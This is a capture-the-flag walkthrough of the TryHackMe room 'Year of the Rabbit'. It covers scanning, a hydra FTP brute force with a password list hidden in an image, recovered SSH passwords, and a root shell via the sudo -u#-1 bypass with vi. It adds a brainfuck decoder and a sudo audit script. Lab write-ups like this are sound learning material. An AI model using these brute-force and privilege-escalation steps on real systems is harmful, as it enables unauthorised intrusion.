TryHackMe: Year of the Rabbit
Year of the Rabbit humbled me. I was feeling great with the rooms I was doing, but this one was tough. I felt demotivated, but I took a break to calm down and think about what to do next, and it worked: there is no rush in learning, good things come with time.
https://tryhackme.com/room/yearoftherabbit
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.73.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 15:16 GMT
Nmap scan report for 10.10.73.92
Host is up (0.061s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.10 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.59 seconds
Web 80
Can’t do much on ftp yet, so we proceed to port 80:
Gobuster Scan
Nothing to see so we do our gobuster scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.73.92
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.73.92
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
/assets (Status: 301) [Size: 311] [--> http://10.10.73.92/assets/]
/index.html (Status: 200) [Size: 7853]
/index.html (Status: 200) [Size: 7853]
/server-status (Status: 403) [Size: 276]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
We don't find much, but we see an assets directory with 2 files inside:
Checking the css file, we find the following:
A php page that, when navigated to, gives us a message:
If we press OK without disabling JavaScript, it will redirect us to the Rick Roll YouTube video, so to get around this we will use the NoScript extension for Firefox. All we have to do is download it and enable restrictions:
And with that, we should be able to see the page:
After listening to the music for a bit, there’s a voice somewhere around 1-2 minutes saying that this is not the correct path.
Not many options left, but our best choice for right now will be using Burp Suite and going around the pages we already have found to see if we can get anything. And sure enough, we find one interesting request:
It contains yet another directory that, when navigated to, had only a single png file:
After downloading the file and running a simple strings on it, we find the following:
┌──(kali㉿kali)-[~/Desktop]
└─$ strings Hot_Babe.png
...
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
...
All we have to do now is put the passwords in a file and brute force the ftp login with hydra:
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l ftpuser -P list 10.10.73.92 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 15:40:06
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.73.92:21/
[21][ftp] host: 10.10.73.92 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 15:40:21
FTP
Now we can log in to ftp, and inside we find a txt file, so we download it with the get command:
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.73.92
Connected to 10.10.73.92.
220 (vsFTPd 3.0.2)
Name (10.10.73.92:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50930|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
229 Entering Extended Passive Mode (|||19647|).
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
100% |*********************************************************************************************| 758 247.07 KiB/s 00:00 ETA
226 Transfer complete.
758 bytes received in 00:00 (12.07 KiB/s)
Shell as eli
When reading the file, we get the following:
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
After some analysis, we see that it's written in brainfuck, an esoteric programming language. There are websites that can translate it, so we will use one to decode it and get eli's ssh credentials:
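As an added example that is not part of the writeup or the room, here is a small brainfuck interpreter that decodes the program above offline, so the credentials never have to be pasted into a third-party website:

```python
# Added example, not from the room: minimal brainfuck interpreter run over the program from Eli's_Creds.txt shown above.
PROGRAM = """
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
"""

def run_bf(src: str, max_steps: int = 1_000_000) -> str:
    code = [c for c in src if c in "+-<>[]."]  # anything else (spaces, newlines) is a comment
    jumps, stack = {}, []  # bracket-matching table, built once up front
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()  # IndexError here means a stray "]"
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets")
    tape, ptr, pc, out = bytearray(30000), 0, 0, []  # 8-bit cells, wrap on overflow
    for _ in range(max_steps):  # step cap: an untrusted program may never halt
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c in "<>":
            ptr += 1 if c == ">" else -1
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif (c == "[" and tape[ptr] == 0) or (c == "]" and tape[ptr] != 0):
            pc = jumps[pc]
        pc += 1
    raise RuntimeError("step limit exceeded")

def decode_creds() -> dict:
    creds = {}
    for line in run_bf(PROGRAM).splitlines():  # output is "Key: value" lines
        key, _, value = line.partition(":")
        creds[key.strip()] = value.strip()
    return creds
```

Calling decode_creds() returns a dict with the "User" and "Password" keys the program prints; the step cap matters because a malformed or hostile program can loop forever.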
When logging into ssh, we see a message from Root to Gwendoline:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh eli@10.10.73.92
eli@10.10.73.92's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
Shell as gwendoline
To find the s3cr3t hiding place they are talking about, assuming it's a directory, we can use the locate command:
eli@year-of-the-rabbit:/usr/share$ locate s3cr3t
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
We see an interesting hidden file, so we can try to read it:
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
And we got gwendoline's password. Since eli didn't have much more to look at, we can switch to gwendoline and get the user flag:
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ cat ~/user.txt
THM{REDACTED}
Shell as root
While enumerating, running sudo -l we see that we have sudo permissions to run the vi binary on the /home/gwendoline/user.txt file:
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
This allows us to run external commands from inside vi while editing user.txt, but we can't run it as root yet: the rule allows any user except root. So first we need to search for ways around it, and we can find one inside another room on TryHackMe called Sudo Security Bypass:
This only works for sudo versions under 1.8.28.
Looking at GTFOBins we find the vi binary, so now all we need to do is run the following:
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
And inside, we just enter:
:!/bin/sh
It will get us a root shell that we can then use to read the root flag:
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{REDACTED}
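As an added defender-side check that is not part of the room or this writeup, the script below audits a captured sudo -l listing and a sudo version string for the two conditions the escalation above depends on: a runas list written as ALL with a !root exclusion, and a sudo older than 1.8.28. The sample listing is the rule shown above; the version string is constructed.

```python
# Added example, not from the room: audit a captured `sudo -l` listing and a sudo
# version string for the two conditions that made the vi escalation possible.
import re

RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+?)\s*$")
FIXED = (1, 8, 28)  # per the writeup, the -u#-1 trick works only on sudo under 1.8.28

def parse_version(text: str) -> tuple:
    # "Sudo version 1.8.27" or "1.8.27p1" -> (1, 8, 27); the patch suffix is ignored
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no version found")
    return tuple(int(x) for x in m.groups())

def version_affected(text: str) -> bool:
    return parse_version(text) < FIXED

def negated_runas_rules(sudo_l_output: str) -> list:
    # Return (runas, command) for rules whose runas list is ALL minus some users.
    hits = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        if "ALL" in runas_users and any(u.startswith("!") for u in runas_users):
            hits.append((m.group(1), m.group(3)))
    return hits

def audit(sudo_l_output: str, version_text: str) -> list:
    findings = [f"rule '({r}) {cmd}': negated runas list; name the allowed users explicitly instead"
                for r, cmd in negated_runas_rules(sudo_l_output)]
    if version_affected(version_text):
        findings.append("sudo older than 1.8.28: -u#-1 runs as root despite a !root exclusion; update sudo")
    return findings

# Constructed sample: the rule from the room's sudo -l output plus a made-up version string.
SAMPLE_SUDO_L = """Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""
SAMPLE_VERSION = "Sudo version 1.8.10p3"  # constructed, not read from the box
```

On a real host, feed it the output of sudo -l and sudo -V; a rule of the form (ALL, !root) should be rewritten to list the intended runas users positively.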